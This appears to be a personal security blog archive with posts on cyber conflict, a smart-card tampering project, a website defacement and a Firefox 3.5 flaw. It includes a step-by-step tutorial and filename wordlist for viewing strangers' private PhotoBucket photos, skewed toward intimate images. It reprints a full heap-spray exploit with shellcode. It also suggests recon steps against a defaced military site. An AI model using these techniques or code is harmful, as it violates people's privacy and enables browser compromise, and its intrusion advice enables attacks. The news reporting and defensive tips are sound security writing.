Visit the new site!
I’ve opened a new blog (which consolidate all the previous one I opened…). I’ll leave this one alive just to maintain links, but new contents will be posted at Infected Packets. Update your bookmarks!
The Syrian Civil Conflict in the Cyber Environment
Introduction
This is an article I wrote a while ago and never got published. It’s a bit outdated now, but I still think it can be useful for historical purposes, so I’ll post a link to it below.
Abstract
This document analyzes the use of the cyber environment in the Syrian civil war by both the population and the government in order to characterize online tactics and strategies developed and used by each belligerent. This overview allows for generalization of online behavior by hacktivists and nation-state sponsored actors on communication networks in the region, which will continue to see online attacks from various parties in the foreseeable future during similar conflict. In Syria, because of poor infrastructure, low rate of Internet penetration and early adoption of control mechanisms by the current government, the authorities had dominance over their information environment early in the conflict, enabling rapid gathering of intelligence on dissidents. While social medias were leveraged by the population as in many other uprisings for coordination, it was also the theater of multiple offensive cyber operations by internal and external groups, mostly for information operations purposes. Despite the high level of activity, none appeared to have a definitive impact on the ground. While events recorded in this space have not reached the level of intensity of other conflicts, it proves a useful model for similar conflicts in the Middle East region.
Reference:
Racicot, Jonathan, The Syrian Civil Conflict in the Cyber Environment, https://www.academia.edu/15182402/The_Syrian_Civil_Conflict_in_the_Cyber_Environment, last accessed 2015-09-03
The Past, Present and Future of Chinese Cyber Operations
Out of nowhere, here’s an article I wrote for the Canadian Military Journal. China, as one of many alleged actors on the frontier of cyber espionage, is best understood by briefly examining the past century, how it influences contemporary cyber operations attributed to Chinese-based actors, and how they could be used against the Canadian Armed Forces in a potential Southeast Asian conflict.
See the full article here: https://www.academia.edu/7633668/The_Past_Present_and_Future_of_Chinese_Cyber_Operations; or
here: http://www.journal.forces.gc.ca/vol14/no3/PDF/CMJ143Ep26.pdf
Phusking PhotoBucket and Other Pictures Sharing Sites
It came to me while I was reading an article on Slashdot about sites popping up, offering the customer to hack into a Facebook, MySpace or other social site for 75$ to 100$. EWeek as a similar article[1]. Seems like those sites mostly use social engineering by sending grammatically deficient e-mail to the victim and somehow, still working most of the time. Most of the time, the goal is to get access to private pictures or information. Hacking Facebook and MySpace accounts is the new “How do I hack Hotmail accounts” of the decade. Just search Google for “facebook hacking service” and plenty of website will be returned.
Same thing with pictures from services like PhotoBucket or Flickr and such. Getting pictures from private albums is much more easier thought and is done thru fusking. The goal is simply to access directly pictures from the private album by guessing the filename of the picture.
As you might know, most cameras have a default naming convention, i.e DSC0001.jpg, Picture0001.jpg etc… (see then end of this article for a complete list) and humans, being lazy as they are, don’t bother renaming them. Since I believe that a example is the best way to learn than 30 pages of detailed explanation, here how it’s done.
Let’s create an account on PhotoBucket first. I used a username I always take everywhere, but it seems that Photobucket didn’t liked it:
PhotoBucket didn't like me the first time...
Anyway, just deleting the Photobucket cookie solve the problem. Registered using brand new data. Small tips, if you are looking for zip code, try this page: Find A Zip, it has about every zip code for every town in the US (I haven’t verified but looks like it…).
Once in, I created a private album and put two pictures in it; one I renamed and the other I left with a camera default filename.
Private album I created in Photobucket
I named one of those pictures DSC0005.jpg and the other an uncommon name:
Private pictures I put into my private album
The URL of my private album is
http://s991.photobucket.com/albums/af33/Cheetah897/Real%20Private%20Album/
The filename is
DSC0005.jpg
So just to try out the concept, I signed out and look if, with the album’s URL and the filename, could access the picture. Oh ! Look at that:
Accessing a private picture thru a direct link
So you should be able to guess the rest from here. Nevertheless, there are tools out there to even do the guessing work for you. The one I will use is PHUSK. It’s especially done for PhotoBucket and is for Windows. This shouldn’t be hard to program for another website and another platform.
PHUSK 1.5 Main Window
There is really not much to explain, just type the username of the victim and set up any properties you want (which are pretty much self explanatory). On the first try, it didn’t found any private album, so I had to specify it by selecting “advanced mode” which show this window:
PHUSK 1.5 Advanced Mode Windows
Select “Add Album”, type the album name and then it will appear in the list of albums (which is ordered).
PHUSK 1.5 Added Album Name in the List
Started PHUSK again and this time it found the private album, it will then try to brute force filenames, which might take a while.
My private picture with a default filename has been found !
I changed the default lists to make it faster, otherwise it might take a long time (411 albums name X 439 filenames X ~9999 file numbers each…).
Here is a list of filenames used by PHUSK. This can be use to build your own list.
| ###.jpg | Unknown-#.jpg | Me.jpg |
| ##.jpg | Untitled-###.jpg | ME.jpg |
| #.jpg | Untitled-##.jpg | mygirls.jpg |
| Picture###.jpg | Untitled-#.jpg | Mygirls.jpg |
| Picture##.jpg | untitled-###.jpg | MYGIRLS.jpg |
| Picture#.jpg | untitled-##.jpg | fine.jpg |
| Photo###.jpg | untitled-#.jpg | Fine.jpg |
| Photo##.jpg | stuff###.jpg | FINE.jpg |
| Photo#.jpg | stuff##.jpg | sexy.jpg |
| #####.jpg | stuff#.jpg | Sexy.jpg |
| ####.jpg | Stuff###.jpg | SEXY.jpg |
| CIMG####.jpg | Stuff##.jpg | hot.jpg |
| CIMG####.JPG | Stuff#.jpg | Hot.jpg |
| DSCN####.jpg | stuff-###.jpg | HOT.jpg |
| PICT####.jpg | stuff-##.jpg | hott.jpg |
| DSC_####.jpg | stuff-#.jpg | Hott.jpg |
| DSC0####.jpg | mycamerapics###.jpg | HOTT.jpg |
| Image###.jpg | mycamerapics##.jpg | really.jpg |
| Image##.jpg | mycamerapics#.jpg | Really.jpg |
| Image##.JPG | mypics###.jpg | REALLY.jpg |
| Image#.jpg | mypics##.jpg | ass.jpg |
| PICT####.JPG | mypics#.jpg | Ass.jpg |
| IMG_####.jpg | Misc-###.jpg | ASS.jpg |
| _MG_####.jpg | Misc-##.jpg | bad.jpg |
| 000_####.jpg | Misc-#.jpg | Bad.jpg |
| 001_####.jpg | misc###.jpg | BAD.jpg |
| 100_####.jpg | misc##.jpg | face.jpg |
| 100-####.jpg | misc#.jpg | Face.jpg |
| 100-####_IMG.jpg | misc-new###.jpg | FACE.jpg |
| 101_####.jpg | misc-new##.jpg | page.jpg |
| 101-####.jpg | misc-new#.jpg | Page.jpg |
| 101-####_IMG.jpg | New###.jpg | PAGE.jpg |
| 102_####.jpg | New##.jpg | tits.jpg |
| 102-####.jpg | New#.jpg | Tits.jpg |
| 102-####_IMG.jpg | New-###.jpg | TITS.jpg |
| 103-####.jpg | New-##.jpg | boobs.jpg |
| 103_####.jpg | New-#.jpg | Boobs.jpg |
| 0##########.jpg | new###.jpg | BOOBS.jpg |
| 1##########.jpg | new##.jpg | breasts.jpg |
| 0########.jpg | new#.jpg | Breasts.jpg |
| 1########.jpg | new-###.jpg | BREASTS.jpg |
| ########.jpg | new-##.jpg | naughty.jpg |
| #######.jpg | new-#.jpg | Naughty.jpg |
| ######.jpg | Old###.jpg | NAUGHTY.jpg |
| Cimg####.jpg | Old##.jpg | smile.jpg |
| DCAM####.jpg | Old#.jpg | Smile.jpg |
| DC####S.jpg | old###.jpg | SMILE.jpg |
| DCFN####.jpg | old##.jpg | light.jpg |
| DCP_####.jpg | old#.jpg | Light.jpg |
| DCP0####.jpg | nude###.jpg | LIGHT.jpg |
| dsc#####.jpg | nude##.jpg | kiss.jpg |
| DSC#####.jpg | nude#.jpg | Kiss.jpg |
| DSC####.jpg | Nude###.jpg | KISS.jpg |
| dsc0####.jpg | Nude##.jpg | kisses.jpg |
| DSCF####.jpg | Nude#.jpg | Kisses.jpg |
| DSCF####.JPG | Sexy###.jpg | KISSES.jpg |
| dscf####.jpg | Sexy##.jpg | muah.jpg |
| DSCI####.jpg | Sexy#.jpg | Muah.jpg |
| DSCI####.JPG | sexy###.jpg | MUAH.jpg |
| dscn####.jpg | sexy##.jpg | mwah.jpg |
| EX00####.jpg | sexy#.jpg | Mwah.jpg |
| HPIM####.jpg | sexxy###.jpg | MWAH.jpg |
| IM00####.jpg | sexxy##.jpg | drunk.jpg |
| IMAG####.jpg | sexxy#.jpg | Drunk.jpg |
| IMAGE_####.jpg | pictures###.jpg | DRUNK.jpg |
| IMAGE####.jpg | pictures##.jpg | drunken.jpg |
| IMG0####.jpg | pictures#.jpg | Drunken.jpg |
| IMG####.jpg | Pictures###.jpg | DRUNKEN.jpg |
| Img#####.jpg | Pictures##.jpg | sleep.jpg |
| IMG_00####.jpg | Pictures#.jpg | Sleep.jpg |
| IMG_#####.jpg | sexypic###.jpg | SLEEP.jpg |
| IMG_####.JPG | sexypic##.jpg | sleeping.jpg |
| IMGA####.JPG | sexypic#.jpg | Sleeping.jpg |
| IMGP####.JPG | sexypics###.jpg | SLEEPING.jpg |
| IMGP####.jpg | sexypics##.jpg | tongue.jpg |
| IMPG####.jpg | sexypics#.jpg | Tongue.jpg |
| KIF_####.jpg | Smile###.jpg | TONGUE.jpg |
| mvc#####.jpg | Smile##.jpg | cute.jpg |
| MVC0####.jpg | Smile#.jpg | Cute.jpg |
| MVC-####.jpg | smile###.jpg | CUTE.jpg |
| MYDC####.jpg | smile##.jpg | hehe.jpg |
| P00#####.jpg | smile#.jpg | Hehe.jpg |
| P10#####.jpg | mirror###.jpg | HEHE.jpg |
| P101####.jpg | mirror##.jpg | us.jpg |
| PC00####.jpg | mirror#.jpg | Us.jpg |
| PANA####.JPG | single###.jpg | US.jpg |
| PDR_####.JPG | single##.jpg | mesexy.jpg |
| PDR_####.jpg | single#.jpg | Mesexy.jpg |
| PDRM####.JPG | Happy###.jpg | MESEXY.jpg |
| PDRM####.jpg | Happy##.jpg | underwear.jpg |
| pdrm####.jpg | Happy#.jpg | Underwear.jpg |
| pict####.jpg | happy###.jpg | UNDERWEAR.jpg |
| Picture#####.jpg | happy##.jpg | thong.jpg |
| Picture####.jpg | happy#.jpg | Thong.jpg |
| Picture###-1.jpg | picture###.jpg | THONG.jpg |
| Picture##-1.jpg | picture##.jpg | panties.jpg |
| Picture#-1.jpg | picture#.jpg | Panties.jpg |
| Picture###-2.jpg | cute###.jpg | PANTIES.jpg |
| Picture##-2.jpg | cute##.jpg | bra.jpg |
| Picture#-2.jpg | cute#.jpg | Bra.jpg |
| Photo####.jpg | xxx###.jpg | BRA.jpg |
| Photo###-1.jpg | xxx##.jpg | costume.jpg |
| Photo##-1.jpg | xxx#.jpg | Costume.jpg |
| Photo#-1.jpg | delete###.jpg | COSTUME.jpg |
| S#######.jpg | delete##.jpg | heart.jpg |
| S######.jpg | delete#.jpg | Heart.jpg |
| S#####.jpg | Halloween###.jpg | HEART.jpg |
| S####.jpg | Halloween##.jpg | bed.jpg |
| SANY####.jpg | Halloween#.jpg | Bed.jpg |
| SDC#####.jpg | halloween###.jpg | BED.jpg |
| scan#####.jpg | halloween##.jpg | shower.jpg |
| SPA#####.jpg | halloween#.jpg | Shower.jpg |
| ST@_#####.jpg | Me###.jpg | SHOWER.jpg |
| STA#####.jpg | Me##.jpg | bath.jpg |
| STP#####.jpg | Me#.jpg | Bath.jpg |
| PANA###.jpg | ME###.jpg | BATH.jpg |
| {user}#.jpg | ME##.jpg | closet.jpg |
| DSCI###.jpg | ME#.jpg | Closet.jpg |
| DigitalCamera###.jpg | me###.jpg | CLOSET.jpg |
| Image(##).jpg | me##.jpg | kitchen.jpg |
| Image(##).JPG | me#.jpg | Kitchen.jpg |
| mvc-###.jpg | 1-###.jpg | KITCHEN.jpg |
| MVC-###.jpg | 1-##.jpg | fridge.jpg |
| Sony#.jpg | 1-#.jpg | Fridge.jpg |
| PhotoMoto_####.jpg | IMG_###.jpg | FRIDGE.jpg |
| ###-1.jpg | IMG_##.jpg | table.jpg |
| ##-1.jpg | IMG_#.jpg | Table.jpg |
| #-1.jpg | naughty###.jpg | TABLE.jpg |
| Picture###.png | naughty##.jpg | risque.jpg |
| Picture##.png | naughty#.jpg | Risque.jpg |
| Picture#.png | Naughty###.jpg | RISQUE.jpg |
| stuff###.jpg | Naughty##.jpg | new.jpg |
| stuff##.jpg | Naughty#.jpg | New.jpg |
| stuff#.jpg | ass###.jpg | NEW.jpg |
| stuff-#.jpg | ass##.jpg | old.jpg |
| S###.jpg | ass#.jpg | Old.jpg |
| S##.jpg | Ass###.jpg | OLD.jpg |
| S#.jpg | Ass##.jpg | halloween.jpg |
| s###.jpg | Ass#.jpg | Halloween.jpg |
| s##.jpg | Pic###.jpg | HALLOWEEN.jpg |
| s#.jpg | Pic##.jpg | cleavage.jpg |
| unknown-###.jpg | Pic#.jpg | Cleavage.jpg |
| unknown-##.jpg | pic###.jpg | CLEAVAGE.jpg |
| unknown-#.jpg | pic##.jpg | pic.jpg |
| Unknown-###.jpg | pic#.jpg | Pic.jpg |
| Unknown-##.jpg | me.jpg | PIC.jpg |
So basically, the way out of phuskers is only to rename your files so that it won’t fit any of the above masks. So a simple description (3-5 words) on what’s on the picture might be able to defeat most of these software.
So here you have it how to get pictures from Photobucket. Although I haven’t shown it here, this concept can be used for other picture sharing sites. As in anything that ever existed, this can be used for good and evil purposes. I started to get interested in computer security by reading that stuff when I was young so my goal here is to do the same, knowing that some script kiddies will probably use this.
Sayonnara
1 “ Security Researchers Find Alleged Facebook Hacking Service ”, Brian Prince, eWeek, September 18, 2009,http://www.eweek.com/c/a/Security/Security-Researchers-Find-Alleged-Facebook-Hacking-Service-358854/ 2009-12-29
A Study of Smart Cards
Cards are quite an interesting species of object that have invaded our lives in every way: we either use them for public transit, laundry, gift cards, phone cards, credit cards etc… One could gather quite a lot of power buy not only understanding their functioning, but also by being able to tamper their data. I must admit that I have absolutely no knowledge (or almost) of those devices, but hopefully, by the end of this project, this will have completely changed.
Visual Study of Smart Cards
Smarts card are usually the size of the credit cards and dimensions are defined accordingly to the ISO/IEC 7810 standard. The standard defines four card sizes: ID-1, ID-2, ID-3 and ID-000. Smart cards are usually comprised in the ID-1 category although some are into the ID-000 category, which mostly comprise of SIM cards. Each of them are 0.76 mm thick. The properties are defined as follow1:
Example of a card using a chip
| Format | Dimension | Usage |
| ID-1 | 85.60 × 53.98 mm | Most banking cards and ID cards |
| ID-2 | 105 × 74 mm | German ID cards issued prior to Nov 2010 |
| ID-3 | 125 × 88 mm | Passports and Visas |
| ID-000 | 25 × 15 mm | SIM cards |
The material use for the card is usually Polyvinyl chloride (PVC). Of course the most interesting item on rhe card is that golden connector. There are various type of connectors as shown in the picture below:
Different Layouts of Cardpads
There are also three main types of smart cards: contact cards, contactless and vault cards [2]
The three main types of Smart Card available
Actually the two that are actually important in everybody’s life are the contact and contactless cards, the latest being use in public transit most of the time. For now I’ll concentrate on contact cards.
Contact Cards
Information is transferred using electrical connectors, i.e the golden chip on the card to the reader. Usually, the chip as around 8 connectors as follow:
Now contact cards are divided in two categories : memory cards and multiprocessor cards. Memory cards are furthermore divided into 3 categories:
- Straight Memory Cards
- Protected/Segmented Memory Cards
- Stored Value Memory Cards
The Project
I recently got handed a laundry smart card and for some reason, got fascinated with it. I never really played with hardware but studying those devices have interested me to the point of studying them in a special project. The goal is to be able to modify the contents of the memory of the card. This project will be conducted in two phases :
- Dump the content of the memory into my computer
- Alter the content and write it back to the card
System Description
A client is handled a Smart Card called “SmartCity” from a company called Coinamatic, which provide laundry solutions to property managers. The card can be loaded and recharged using coins or debit/credit cards through “reload centers“. You can put up to 50$ maximum on the card. To use the facilites, you need to insert the card into a slot built into the washers/dryers. The washer is a Commercial Energy Advantage Top Load Washer MAT14PRAWW model. The dryer is a 27″ Commercial Single-Load Electric Stack Dryer model MLE24PRAZW.
Next post : the card reader/writer
See also:
EMV 4.2 Specification, EMVCo, May 2008, http://emvco.com/ accessed on 2009-07-20
Infineon SLE4442, Flylogic Engineering’s Analytical Blog, December 1st, 2007, http://www.flylogic.net/blog/?p=17 accessed on 2009-07-20
How-to: Read a FedEx Kinko’s smart card (SLE4442), Ian Lesnet, Hack-a-day, November 28th, 2008, http://hackaday.com/2008/11/25/how-to-read-a-fedex-kinkos-smart-card-sle4442/, accessed on 2009-07-20
Intelligent 256-Byte EEPROM SLE 4432/SLE 4442, Siemens, 1995, http://www.smartcardsupply.com/PDF/DS_sle4432_42_0795.pdf accessed on 2009-07-20
Kinko’s Smart Card (Siemens SLE4442 memory chip), Strom Calson, http://www.stromcarlson.com/projects/smartcard/format.pdf accessed on 2009-07-20
1K EEPROM – Security Logic with Two Application Zones AT88SC102, Atmel, 1999, http://www.datasheetcatalog.org/datasheet/atmel/DOC1419.PDF accessed on 2009-07-20
[1] ISO/IEC 7810, Wikipedia, http://en.wikipedia.org/wiki/ISO/IEC_7810 accessed on 2009-07-20
[2] Types of Chip Cards, Smart Card Basics, 2005, http://www.smartcardbasics.com/cardtypes.html accessed on 2009-07-20
RAAF website defaced
Atul Dwivedi, an Indian hacker paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.
This accident comes amid a raise in violence targeted towards Indian native in Australia and apparently Dwivedi protested this situation by leaving a message on the website:
“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”
|
 Racist incident in Australia against Indian students has increased in the last months |
This site is now up and running as per normal. Of course the webserver wasn’t connected to any internal network and didn’t contain any classified information according to a spokewoman:
“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information,1“
Microsoft products are used in pretty much every Western armed forces. So it’s save to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies as Windows machine and a Windows Server machine means that everything is almost certainly all Microsoft based. Of course we can now verify those claims and according to David M Williams from ITWire2 the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits. Which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The site still has an excellent link to a blog detailing the WebDAV exploit, see below for the link.
It’s not impossible to think that Dwivedi might have tricked someone into giving out too much information also. Social engineering can do lots and is usually easier than technical exploits. The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up on Facebook or another social networking site for some people in the RAAF and then try to pose as them and pose as them.
Then also, why not look for the FTP server? And God knows what else the server is running; maybe a SMTP server also (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, using web vulnerability tools like Nikto could help find misconfigured settings in ASP or forgotten test/setup pages/files. Up to there, only two things are important: information gathering and imagination.
See also:
“Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html accessed on 2009-07-17
“WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 accessed on 2009-07-17
1 “Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html accessed on 2009-07-16
2 “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ accessed on 2009-07-16
Firefox Javascript Vulnerability
Once again, Javascript is the source of a new exploit that has been recently discovered on Firefox1. The vulnerability can be exploited by crafting malicious Javascript code on a Firefox 3.5 browser and leads to the execution of arbitrary code on the user’s machine. This is due to a vulnerability in the JIT engine of Firefox and affects machine running a x86, SPARC or arm architectures.
The vulnerability resolves around the return value of the escape function in the JIT engine. It’s exploited using the <font> tag. The code for the exploit is public and can be found at milw0rm. The exploit use a heap spraying technique to execute the shellcode.
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800"+
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
# milw0rm.com [2009-07-13]
A fix should be available soon, but the best solution is always to disable Javascript, although a lot of sites rely on it to operate. Another way is to use the NoScript plug-in, which let you enable and disable scripts easily according to a whitelist/blacklist system.
See also:
“Mozilla Firefox Memory Corruption Vulnerability”, Secunia, July 14, 2009, http://secunia.com/advisories/35798/ accessed on 2009-07-15
“Exploit 9137”, SBerry, July 13, 2009, http://milw0rm.com/exploits/9137 accessed on 2009-07-15
“Stopgap Fix for Critical Firefox 3.5 Security Hole”, Brian Krebs, The Washington Post, July 14, 2009, http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.html accessed on 2009-07-15
“Critical JavaScript vulnerability in Firefox 3.5”, Mozilla Security Blog, July 14, 2009, http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/ accessed on 2009-07-15
1 “Mozilla Foundation tackles Firefox bug”, Nick Farell, The Inquirer, Wednesday, 15, July, 2009, http://www.theinquirer.net/inquirer/news/1433480/mozilla-foundation-tackles-firefox-bug accessed on 2009-07-15
